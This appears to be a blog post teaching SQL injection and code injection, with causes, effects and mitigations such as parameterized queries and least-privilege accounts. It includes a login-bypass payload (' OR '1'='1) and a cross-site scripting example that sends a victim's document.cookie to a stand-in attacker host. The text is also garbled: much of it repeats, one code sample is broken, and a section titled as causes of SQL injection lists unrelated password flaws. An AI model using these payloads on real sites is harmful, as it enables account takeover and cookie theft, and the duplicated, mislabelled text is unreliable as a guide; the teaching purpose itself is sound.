SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.
It is insertion or “injection” of a SQL query via the input data from the client to the application.
“An attack technique used to exploit web sites by altering back-end SQL statements through manipulating application input.”
It is insertion or “injection” of a SQL query via the input data from the client to the application.
“An attack technique used to exploit web sites by altering back-end SQL statements through manipulating application input.”
How it happens?
For example, consider a web page has two fields to allow users to enter
1. User name
2. Password.
The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = ‘Username’ AND
UserList.Password = ‘Password’
if this query returns any rows, then access is granted.
However, if the malicious user enters a valid Username and injects some valid code (“password’ OR ’1′=’1″) in the Password field, then the resulting query will look like this:
For example, consider a web page has two fields to allow users to enter
1. User name
2. Password.
The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = ‘Username’ AND
UserList.Password = ‘Password’
if this query returns any rows, then access is granted.
However, if the malicious user enters a valid Username and injects some valid code (“password’ OR ’1′=’1″) in the Password field, then the resulting query will look like this:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = ‘Username’ AND UserList.Password = ‘password’ OR ’1′=’1′
UserList.Username = ‘Username’ AND UserList.Password = ‘password’ OR ’1′=’1′
In the example above, “Password” is assumed to be blank or some innocuous string. “’1′=’1′” will always be true and many rows will be returned, thereby allowing access.
Causes of SQL Injection Vulnerability
SQL Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn’t properly filter out dangerous characters.
These vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
These vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
How the Attacker’s works??
Attackers commonly insert single quotes (‘) into a URL’s query string, or into a forms input field to test for SQL Injection. If an attacker receives an error message like the one below, there is a good chance that the application is vulnerable to SQL Injection.
Error message:-
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′ [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ‘or‘ /wasc.asp, line 69.
Attackers commonly insert single quotes (‘) into a URL’s query string, or into a forms input field to test for SQL Injection. If an attacker receives an error message like the one below, there is a good chance that the application is vulnerable to SQL Injection.
Error message:-
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′ [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ‘or‘ /wasc.asp, line 69.
Effects of SQL Injection:
A successful SQL injection allow attackers to
– tamper with existing data
– read
– modify database data (Insert/Update/Delete)
– execute administration operations on the database (such as shutdown the
DBMS)
destroy the data or make it otherwise unavailable.
A successful SQL injection allow attackers to
– tamper with existing data
– read
– modify database data (Insert/Update/Delete)
– execute administration operations on the database (such as shutdown the
DBMS)
destroy the data or make it otherwise unavailable.
Where and why it Occur??
Where:- SQL Injection is very common with PHP and ASP applications
Why:-
1. Due to the prevalence of older functional interfaces.
2. Due to the nature of programmatic interfaces available.
Why:-
1. Due to the prevalence of older functional interfaces.
2. Due to the nature of programmatic interfaces available.
How to avoid??
There are three complementary and successful methods of mitigating SQL Injection attacks:
There are three complementary and successful methods of mitigating SQL Injection attacks:
1. Parameterized queries using bound, typed parameters.
2. Careful use of parameterized stored procedures.
3. Least privilege connections.
2. Careful use of parameterized stored procedures.
3. Least privilege connections.
Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
Java EE, .NET, PHP
Parameterized Queries with Bound Parameters
It keeps the query and data separate through the use of placeholders known as “bound” parameters. For example in Java, this looks like this:
“select * from table where column a=? and column b=?”
The developer must set values for the two? placeholders.
It keeps the query and data separate through the use of placeholders known as “bound” parameters. For example in Java, this looks like this:
“select * from table where column a=? and column b=?”
The developer must set values for the two? placeholders.
Note:-
Using this syntax without actually using the placeholders and setting values provides no protection against SQL injection
Using this syntax without actually using the placeholders and setting values provides no protection against SQL injection
Parameterized Stored Procedures:
It is an effective mechanism to avoid most forms of SQL Injection.
In combination with parameterized bound queries, it is very unlikely that SQL injection will occur within your application.
Dynamic code execution features can allow SQL Injection,
In combination with parameterized bound queries, it is very unlikely that SQL injection will occur within your application.
Dynamic code execution features can allow SQL Injection,
create proc DynamicSQL(@userName nvarchar(25)) as
declare @sql nvarchar(255)
set @sql = ‘select * from users where UserName = + @userName + ‘ exec sp_executesql @sql
declare @sql nvarchar(255)
set @sql = ‘select * from users where UserName = + @userName + ‘ exec sp_executesql @sql
Least privilege connections:
Always use accounts with the minimum privilege necessary for the application at hand, never use name as
“sa”, “dba”, “admin”, or the equivalent.
“sa”, “dba”, “admin”, or the equivalent.
What is Code injection?
Code injection is the exploitation of a computer bug that is caused by processing invalid data.
Code injection is the exploitation of a computer bug that is caused by processing invalid data.
Code injection can be used by an attacker to introduce (or “inject”) code into a computer program to change the course of execution.
Example
A web server has a “Guest book” script, which accepts small messages from users, and typically receives messages such as
A web server has a “Guest book” script, which accepts small messages from users, and typically receives messages such as
Very Nice site!
However a malicious person may know of a code injection vulnerability in the “Guest book”, and enters a message such as
Nice Site, I think I’ll take it.> document.location=’http://some_attacker/cookie.cgi?’ +document.cookie
If another user views the page then the injected code will be executed. This code can allow the attacker to Represent another user. However this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code.
Security vulnerabilities
Term vulnerability is applied to a weakness in a system which allows an attacker to violate the integrity of that system.
Vulnerabilities may result from
– weak passwords.
– software bugs.
– computer virus.
-script code injection & SQL injection.
Term vulnerability is applied to a weakness in a system which allows an attacker to violate the integrity of that system.
Vulnerabilities may result from
– weak passwords.
– software bugs.
– computer virus.
-script code injection & SQL injection.
Causes of SQL injection
Password Management Flaws:
– user uses weak passwords that could be discovered.
– user stores the password on the computer where a
program can access it
– Users re-use passwords between many programs and
websites.
Password Management Flaws:
– user uses weak passwords that could be discovered.
– user stores the password on the computer where a
program can access it
– Users re-use passwords between many programs and
websites.
Fundamental Application Design Flaws – application
designer chooses to enforce sub optimal policies on
user/program management.
For example,
Default permit grant every program and every
user full access to the entire computer. This operating
system flaw allows viruses to execute commands on behalf
of the administrator.
Software Bugs
– Sometime, programmer leaves an exploitable bug in a software program. Those software bug may allow an attacker to misuse an application through “Unchecked User Input”.
designer chooses to enforce sub optimal policies on
user/program management.
For example,
Default permit grant every program and every
user full access to the entire computer. This operating
system flaw allows viruses to execute commands on behalf
of the administrator.
Software Bugs
– Sometime, programmer leaves an exploitable bug in a software program. Those software bug may allow an attacker to misuse an application through “Unchecked User Input”.
The program assumes that all user input is safe. Programs that do not check user input can allow unintended direct execution of commands or SQL statements (known as Buffer overflows, SQL injection).
Examples of vulnerabilities
Common types of vulnerabilities
Memory safety violations, such as:
Buffer overflows
Dangling pointers
Input validation errors, such as:
Format string bugs
Improperly handling shell metacharacters so they are interpreted
SQL injection
Code injection
E-mail injection
Directory traversal
Cross-site scripting in web applications
HTTP header injection
HTTP response splitting
Race conditions, such as:
Time-of-check-to-time-of-use bugs
Symlink races
Common types of vulnerabilities
Memory safety violations, such as:
Buffer overflows
Dangling pointers
Input validation errors, such as:
Format string bugs
Improperly handling shell metacharacters so they are interpreted
SQL injection
Code injection
E-mail injection
Directory traversal
Cross-site scripting in web applications
HTTP header injection
HTTP response splitting
Race conditions, such as:
Time-of-check-to-time-of-use bugs
Symlink races
No comments:
Post a Comment